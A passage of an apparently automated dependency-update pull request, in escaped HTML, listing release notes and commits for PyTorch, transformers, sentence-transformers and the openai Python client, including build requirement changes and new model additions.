Changes\u003c/h1\u003e\n\u003ch2\u003eBuild Frontend\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eStrengthened SVE compile checks in \u003ccode\u003eFindARM.cmake\u003c/code\u003e, which may reject previously accepted but incorrect SVE configurations (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/176646\"\u003e#176646\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eSource builds that enable SVE now validate the compiler configuration more strictly. If a build previously passed with an incomplete or mismatched SVE setup, it may now fail during CMake configuration instead of later in compilation. Update the compiler/toolchain flags so they accurately describe the target SVE support, or disable SVE for that build.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated the minimum CUDA version required to build PyTorch from source to CUDA 12.6 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178925\"\u003e#178925\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eBuilding PyTorch from source with CUDA versions older than 12.6 is no longer supported. Users building custom binaries should install CUDA 12.6 or newer and make sure \u003ccode\u003eCUDA_HOME\u003c/code\u003e points to that installation.\u003c/p\u003e\n\u003cp\u003eVersion 2.11:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.4 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eVersion 2.12:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.6 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEnforced a C++20 minimum in CMake build files (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178662\"\u003e#178662\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/0d62256a2b23365f8e1604297eb23a6545102aa8\"\u003e\u003ccode\u003e0d62256\u003c/code\u003e\u003c/a\u003e [release] Dockerfile: skip torchaudio install when CUDA_PATH=cu132 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/183346\"\u003e#183346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/7661cd9c6b841b62b7f411aa52ec51f05457263b\"\u003e\u003ccode\u003e7661cd9\u003c/code\u003e\u003c/a\u003e [MPS] Fix SDPA wrong output for permuted q/k/v with B \u0026gt; 1 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181886\"\u003e#181886\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/9da6087ab64ab6a2118686420ca5353c90dd7e1f\"\u003e\u003ccode\u003e9da6087\u003c/code\u003e\u003c/a\u003e Fix stale PYTORCH_RELEASES_CODE_CC dict (fixes \u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182250\"\u003e#182250\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182369\"\u003e#182369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/e4c37cc011d47246ce8ea4b99c9b28fb7f400224\"\u003e\u003ccode\u003ee4c37cc\u003c/code\u003e\u003c/a\u003e Avoid raw stream name collisions in Inductor (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182178\"\u003e#182178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/822d047dc8dd8d919f83c3ad5c786e405075d1f0\"\u003e\u003ccode\u003e822d047\u003c/code\u003e\u003c/a\u003e [MPS] Fix bool mask handling in 1-pass SDPA decode kernel (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182285\"\u003e#182285\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182311\"\u003e#182311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/5c5e523cd520e6986006e45be243b3ee927ea546\"\u003e\u003ccode\u003e5c5e523\u003c/code\u003e\u003c/a\u003e Add enable_gqa parameter to SDPA MPS meta registration (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181550\"\u003e#181550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/eece52ead16886e5463c3dcee9b04db783cc68d5\"\u003e\u003ccode\u003eeece52e\u003c/code\u003e\u003c/a\u003e [AOTI] Add BC-safe c_shim v2 for _scaled_dot_product_attention_math_for_mps e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/b39330bbe210b9628207e84d8ba2cabb7975fbac\"\u003e\u003ccode\u003eb39330b\u003c/code\u003e\u003c/a\u003e [Inductor] Call latest c_shim version for versioned fallback ops (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181548\"\u003e#181548\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/06f10d088229a25ac52bd14b6cacc04a4161f6ca\"\u003e\u003ccode\u003e06f10d0\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[FSDP2] add fqn to communication ops\u0026quot; (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182100\"\u003e#182100\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182157\"\u003e#182157\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/449e3393139a1aca9afec120c9a63f98f12d55b0\"\u003e\u003ccode\u003e449e339\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[Inductor] Improve materialization heuristic for a chain of computaio...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytorch/pytorch/compare/v2.11.0...v2.12.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `transformers` from 5.7.0 to 5.10.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/transformers/releases\"\u003etransformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePatch release v5.10.2\u003c/h1\u003e\n\u003cp\u003eThere was a big bug in the model conversion of models related to clip, this affected models like sam3 and others. Please make sure to update :pray:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix conversion for clip models by \u003ca href=\"https://github.com/zucchini-nlp\"\u003e\u003ccode\u003e@​zucchini-nlp\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\"\u003ehttps://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\u003c/a\u003e\u003c/p\u003e\n\u003ch1\u003eRelease v5.10.1\u003c/h1\u003e\n\u003cp\u003ev5.10.0 was yanked as we publish on a corrupted branch. Sorry everyone, this happens when we rush a release!!!\u003c/p\u003e\n\u003ch2\u003eNew Model additions\u003c/h2\u003e\n\u003ch3\u003eGemma4 unified+ Gemma4 MTP\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eGemma 4 12B Unified is an \u003cstrong\u003eencoder-free\u003c/strong\u003e multimodal model with pretrained and instruction-tuned variants. Unlike \u003ca href=\"https://github.com/huggingface/transformers/blob/HEAD/gemma4\"\u003estandard Gemma 4\u003c/a\u003e, which uses dedicated encoder towers, Gemma 4 12B Unified projects raw inputs directly into the language model's embedding space through lightweight linear pipelines. This results in a simpler architecture while maintaining strong multimodal performance.\u003c/p\u003e\n\u003cp\u003eKey differences from standard Gemma 4:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eNo Vision Tower\u003c/strong\u003e: Raw pixel patches are projected directly into LM space via a \u003ccode\u003eDense + LayerNorm\u003c/code\u003e pipeline with factorized 2D positional embeddings, replacing the vision encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo Audio Tower\u003c/strong\u003e: Raw 16 kHz waveform samples are chunked into fixed-length frames and projected through a simple \u003ccode\u003eRMSNorm → Linear\u003c/code\u003e pipeline, replacing the mel spectrogram + Conformer encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShared Multimodal Pipeline\u003c/strong\u003e: Both vision and audio use the same \u003ccode\u003eGemma4UnifiedMultimodalEmbedder\u003c/code\u003e (RMSNorm → Linear) for the final projection to text hidden space.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eYou can find the original Gemma 4 12B Unified checkpoints under the \u003ca href=\"https://huggingface.co/collections/google/gemma-4\"\u003eGemma 4\u003c/a\u003e release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ewho needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e) by \u003ca href=\"https://github.com/douglas-reid\"\u003e\u003ccode\u003e@​douglas-reid\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/sgerrard\"\u003e\u003ccode\u003e@​sgerrard\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/vasqu\"\u003e\u003ccode\u003e@​vasqu\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/molbap\"\u003e\u003ccode\u003e@​molbap\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eSapiens2\u003c/h3\u003e\n\u003cp\u003eSapiens2 is a family of high-resolution vision transformers pretrained on ~1 billion curated human images, designed for human-centric computer vision tasks including pose estimation, body-part segmentation, surface normal estimation, and pointmap estimation. The models scale from 0.4B to 5B parameters and train at native 1K resolution, with hierarchical 4K variants for extended spatial reasoning. Sapiens2 achieves substantial improvements over its predecessor with +4 mAP in pose estimation, +24.3 mIoU in body-part segmentation, and 45.6% error reduction in normal estimation.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/sapiens2\"\u003eDocumentation\u003c/a\u003e | \u003ca href=\"https://huggingface.co/papers/2604.21681\"\u003ePaper\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e) by \u003ca href=\"https://github.com/guarin\"\u003e\u003ccode\u003e@​guarin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45919\"\u003e#45919\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeepSeek-OCR-2\u003c/h3\u003e\n\u003cp\u003eDeepSeek-OCR-2 is an OCR-specialized vision-language model built on a distinctive architecture that combines a SAM ViT-B vision encoder with a Qwen2 hybrid attention encoder, connected through an MLP projector to a DeepSeek-V2 Mixture-of-Experts (MoE) language model. The model features a hybrid attention mechanism that applies bidirectional attention over image tokens and causal attention over query tokens, enabling efficient and accurate document understanding. It supports both plain OCR tasks and grounding capabilities with coordinate-aware output for document conversion to markdown format.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/deepseek_ocr2\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Deepseek-OCR-2 model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45075\"\u003e#45075\u003c/a\u003e) by \u003ca href=\"https://github.com/thisisiron\"\u003e\u003ccode\u003e@​thisisiron\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45075\"\u003e#45075\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMellum\u003c/h3\u003e\n\u003cp\u003eMellum is a code-focused Mixture-of-Experts language model developed by JetBrains. It is derived from the Qwen3-MoE architecture with per-layer-type RoPE and interleaved sliding window attention. The model has 12B total parameters with 2.5B active parameters per token, using 64 routed experts with 8 activated per token across 28 layers.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/mellum\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Add support for JetBrains' \u003ccode\u003eMellum\u003c/code\u003e v2 code generation model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46112\"\u003e#46112\u003c/a\u003e) by \u003ca href=\"https://github.com/shadeMe\"\u003e\u003ccode\u003e@​shadeMe\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/46112\"\u003e#46112\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0dad7b822255a0ae261ec45ae937371e859ffd1a\"\u003e\u003ccode\u003e0dad7b8\u003c/code\u003e\u003c/a\u003e v5.10.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/8a4ffee847b90a732a1febefeca5180fffd5596f\"\u003e\u003ccode\u003e8a4ffee\u003c/code\u003e\u003c/a\u003e Fix conversion for clip models (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/90c3ae54d448d4906b6167317ea5a7f5d48a232d\"\u003e\u003ccode\u003e90c3ae5\u003c/code\u003e\u003c/a\u003e Patch because we had to yank 5.10 because the release branch was not up to date\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0bd94b37db639d8f29a094dce2fde06f86af8968\"\u003e\u003ccode\u003e0bd94b3\u003c/code\u003e\u003c/a\u003e v5.10.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1423d22f7a3b62e8c70ad67b58ec25cd9b675897\"\u003e\u003ccode\u003e1423d22\u003c/code\u003e\u003c/a\u003e who needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/50eb20a24f9dd512e6770072f422e4b86ca3cd98\"\u003e\u003ccode\u003e50eb20a\u003c/code\u003e\u003c/a\u003e Fix dsv4 dequant + tp/ep (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46378\"\u003e#46378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/74464e8c49c91b574c30cc3cb3c5a44000237299\"\u003e\u003ccode\u003e74464e8\u003c/code\u003e\u003c/a\u003e Fix wrong changes produced by style/repo. check bot (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46371\"\u003e#46371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1b8ec344fb6c277235fc76c37e7a5c156a1f0ddc\"\u003e\u003ccode\u003e1b8ec34\u003c/code\u003e\u003c/a\u003e Fix path traversal when saving Bark voice preset embeddings (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46237\"\u003e#46237\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/e820678256f22e7647e39e8b7ed040fa81b7b872\"\u003e\u003ccode\u003ee820678\u003c/code\u003e\u003c/a\u003e Add Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/595721c44cb14db37fa504903e2edd5e9f0eba43\"\u003e\u003ccode\u003e595721c\u003c/code\u003e\u003c/a\u003e Pass library_name/version to Hub calls via a shared HfApi (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46318\"\u003e#46318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.7.0...v5.10.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sentence-transformers` from 5.4.1 to 5.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/sentence-transformers/releases\"\u003esentence-transformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.1 - Small Multimodal patch\u003c/h2\u003e\n\u003cp\u003eThis patch release fixes a small quirk with multimodal inference when using single-key multimodal inputs like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003e# Training + Inference\r\npip install sentence-transformers[train]==5.5.1\r\n\u003ch1\u003eInference only, use one of:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers==5.5.1\npip install sentence-transformers[onnx-gpu]==5.5.1\npip install sentence-transformers[onnx]==5.5.1\npip install sentence-transformers[openvino]==5.5.1\u003c/p\u003e\n\u003ch1\u003eMultimodal dependencies (optional):\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[image]==5.5.1\npip install sentence-transformers[audio]==5.5.1\npip install sentence-transformers[video]==5.5.1\u003c/p\u003e\n\u003ch1\u003eOr combine as needed:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[train,onnx,image]==5.5.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003ch2\u003eBug fixed\u003c/h2\u003e\n\u003cp\u003ePreviously, inference like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e or \u003ccode\u003emodel.encode([{\u0026quot;image\u0026quot;: ...}, ...])\u003c/code\u003e would be inferred as the \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e modality, which differed from the inferred modality of \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e for just \u003ccode\u003emodel.encode(my_image)\u003c/code\u003e or \u003ccode\u003emodel.encode([my_image, my_image_2, ...])\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis results in confusing errors if the model doesn't have a \u003ccode\u003emodality_config\u003c/code\u003e mapping for \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e in addition to \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, so now a single-key multimodal dict is collapsed to the bare modality (just \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e in this example).\u003c/p\u003e\n\u003cp\u003eThis affected this code:\u003c/p\u003e\n\u003cpre lang=\"python\"\u003e\u003ccode\u003e\r\nfrom sentence_transformers import SentenceTransformer\r\n\u003cp\u003emodel = SentenceTransformer('BAAI/BGE-VL-base', trust_remote_code=True)\nembedding = model.encode({\u0026quot;image\u0026quot;: \u0026quot;\u003ca href=\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;%7D\"\u003ehttps://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;}\u003c/a\u003e)\nprint(embedding.shape)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eWhich previously failed as the model only implements a path for \u003ccode\u003e\u0026quot;text\u0026quot;\u003c/code\u003e, \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, and \u003ccode\u003e(\u0026quot;image\u0026quot;, \u0026quot;text\u0026quot;)\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eAll Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Collapse single-key multimodal dicts to bare modality by \u003ca href=\"https://github.com/tomaarsen\"\u003e\u003ccode\u003e@​tomaarsen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\"\u003ehttps://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.0 - Training Agent Skill, EmbedDistillLoss, and ADRMSELoss\u003c/h2\u003e\n\u003cp\u003eThis release ships the \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill, adds two new training losses, and brings a long list of robustness and correctness fixes.\u003c/p\u003e\n\u003cp\u003eThe new \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill lets AI coding agents (Claude Code, Codex, Cursor, Gemini CLI, ...) drive end-to-end training and fine-tuning across all three model types. \u003ccode\u003eEmbedDistillLoss\u003c/code\u003e is a new embedding-level knowledge distillation loss for \u003ccode\u003eSentenceTransformer\u003c/code\u003e: it aligns a student model's embeddings with pre-computed teacher embeddings, an alternative to the score-based distillation provided by \u003ccode\u003eMarginMSELoss\u003c/code\u003e and \u003ccode\u003eDistillKLDivLoss\u003c/code\u003e. \u003ccode\u003eADRMSELoss\u003c/code\u003e is a new listwise learning-to-rank loss for \u003ccode\u003eCrossEncoder\u003c/code\u003e from the Rank-DistiLLM paper. \u003ccode\u003eencode()\u003c/code\u003e and \u003ccode\u003epredict()\u003c/code\u003e also gain a per-call \u003ccode\u003eprocessing_kwargs\u003c/code\u003e override, and more.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/ce3ec6d87f25b2d1cccb0a20f8fd495dad5c30fb\"\u003e\u003ccode\u003ece3ec6d\u003c/code\u003e\u003c/a\u003e Release v5.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/610a7c5ccfdfccc19933900feba0206f2e76bf59\"\u003e\u003ccode\u003e610a7c5\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003efix\u003c/code\u003e] Collapse single-key multimodal dicts to bare modality (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/f9f3269c7bd548555b7273a5378d52eeaa5d6286\"\u003e\u003ccode\u003ef9f3269\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into v5.5-release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/02dc21d77dfd22b5816fb5398877253100b89b43\"\u003e\u003ccode\u003e02dc21d\u003c/code\u003e\u003c/a\u003e Update index tip for v5.5.0 (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3774\"\u003e#3774\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/833828b3dae0cf9e6943ae01b9c9645f883daf3b\"\u003e\u003ccode\u003e833828b\u003c/code\u003e\u003c/a\u003e Release v5.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/98ac358861359fd275824732e5f658b2f4ca6c78\"\u003e\u003ccode\u003e98ac358\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Load models in float32 in the training examples \u0026amp; docs (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3773\"\u003e#3773\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/d8ee0410ba140f41aa2ac0735a97e1d690dd2df5\"\u003e\u003ccode\u003ed8ee041\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use modality-neutral terms (input, document) in loss docs \u0026amp; docstrin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/4c6850e444e5bcedfb026e9d674ae18c19ab5233\"\u003e\u003ccode\u003e4c6850e\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003eexamples\u003c/code\u003e] Avoid LoggingHandler, silence httpx in examples (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3771\"\u003e#3771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/1418823d250763751ea95212dfb9ecaa919f5e92\"\u003e\u003ccode\u003e1418823\u003c/code\u003e\u003c/a\u003e docs: fix grammar in parallel-sentence-mining README (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3769\"\u003e#3769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/22a383d3644cfaa40038adb0b70a9320f7f73d36\"\u003e\u003ccode\u003e22a383d\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use direct class imports in examples \u0026amp; docs (drop `losses.MSELoss(.....\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.4.1...v5.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `openai` from 2.32.0 to 2.41.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/openai/openai-python/releases\"\u003eopenai's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.41.0\u003c/h2\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.40.0\u003c/h2\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.39.0\u003c/h2\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca 